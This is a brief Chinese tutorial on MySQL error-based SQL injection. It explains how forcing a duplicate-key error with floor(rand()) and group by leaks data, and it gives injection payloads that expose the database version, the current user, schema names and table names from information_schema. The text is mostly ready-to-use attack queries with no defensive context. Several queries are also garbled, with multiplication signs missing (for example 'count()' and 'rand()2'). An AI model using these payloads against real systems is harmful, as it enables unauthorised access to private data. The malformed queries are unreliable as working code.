1.自报家底
自报家底:没有错误也要制造错误,并把查询的信息让错误带出来告诉注入者到底有什么东西,把所有家底能透露的都透露了。
相关函数:If(),rand(),floor(),ifnull(),concat,group_concat()#### 2.自报家底暴露用户名 1.原理: Select count() ,floor(rand()2) as a from users group by a;
2为因子数,数字越小,冲突可能性越大。最小为2.
2.暴露系统用户名敏感信息
Select count(),concat(version(),floor(rand()2),user()) as a from users group by a;#### 3.暴露所有库名,表名
所有库名: select count(),concat((select (select (SELECT schema_name FROM information_schema.schemata limit 0,1)) as a_col from information_schema.tables limit 0,1),floor(rand(0)2)) x_col from information_schema.tables group by x_col
所有表名: select count(),concat((select (select (SELECT table_name FROM information_schema.tables where table_schema=database() limit 0,1)) as a_col from information_schema.tables limit 0,1),floor(rand(0)2))x_col from information_schema.tables group by x_col
若有收获,就点个赞吧
0 人点赞
